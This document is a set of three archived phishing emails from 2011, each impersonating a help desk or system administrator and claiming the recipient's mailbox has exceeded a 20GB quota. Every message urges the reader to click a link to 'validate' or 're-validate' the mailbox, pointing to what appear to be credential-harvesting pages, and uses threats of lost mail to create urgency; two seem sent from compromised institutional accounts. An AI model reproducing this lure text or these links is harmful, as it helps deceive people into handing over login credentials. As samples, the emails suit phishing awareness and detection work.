Subject: Your mailbox is almost full.

From: "An, Nguyen Thanh" <[email-masked]>
Date: Tue, 11 Jan 2011 04:40:01 +0700

Your mailbox is almost full.

20GB	  	 23GB	
Current size	  	 Maximum size	

Your Webmail Quota Has Exceeded The Set Quota/Limit Which Is 20GB.
You Are Currently Running On 23GB Due To Hidden Files And Folder On Your Mailbox.
Please Click the Link Below To Validate Your Mailbox And Increase Your Quota.
 
Click Here <http://acc-central1.com/>  <http://www.timeanddate.com/time/> :
 
Failure To Click This Link And Validate Your Quota May Result In Loss Of Important Information In Your Mailbox/Or Cause Limited Access To It.
Thanks
HELP DESK

---

From: Robert Pasquantonio <[email-masked]>
Date: Mon, 28 Mar 2011 02:47:30 -0400

________________________________
From: Robert Pasquantonio
Sent: Monday, March 28, 2011 1:58 AM
To: [email-masked]
Subject: Your mailbox is almost full.

Your mailbox has exceeded the storage limit which is 20GB as set by your administrator, you are currently running on 20.9GB,you may not be able to send or receive new mail until you re-validate your mailbox. To re-validate your mailbox please: http://socolo.web.officelive.com/default.aspx

<http://dentquote.com/php/use/levea/form1.html>
Thanks

System Administrator.

E-MAIL CONFIDENTIALITY NOTICE:
The information transmitted in this electronic message may be legally privileged
and confidential under applicable law, including the Family Educational Rights and
Privacy Act (FERPA) and the Health Insurance Portability and Accountability Act
(HIPAA), and is intended only for the person or entity to which it is addressed. If the
recipient of this message is not the above named intended recipient, you are hereby
notified that any review, retransmission, dissemination, copy, disclosure or other use of,
or taking any action in reliance upon, this information by persons or entities other than
the intended recipient is prohibited. If you received this electronic transmission in error,
please notify the Bethel Park School District at (412) 854-8402, and purge the
communication immediately from any computers, storage devices, paper or other media
without making any copy or distribution thereof. Thank you for your cooperation.

---

From: "Farrell, Tim" <[email-masked]>
Date: Wed, 6 Apr 2011 14:37:18 -0600

________________________________
From: Farrell, Tim
Sent: Wednesday, April 06, 2011 2:06 PM
To: [email-masked]
Subject: Your mailbox is almost full.

Your mailbox has exceeded the storage limit which is 20GB as set by your administrator, you are currently running on 20.9GB,you may not be able to send or receive new mail until you re-validate your mailbox. To re-validate your mailbox please:   http://webmasterny.web.officelive.com/default.aspx<http://webmasterny.web.officelive.com/default.aspx>

System Administrator.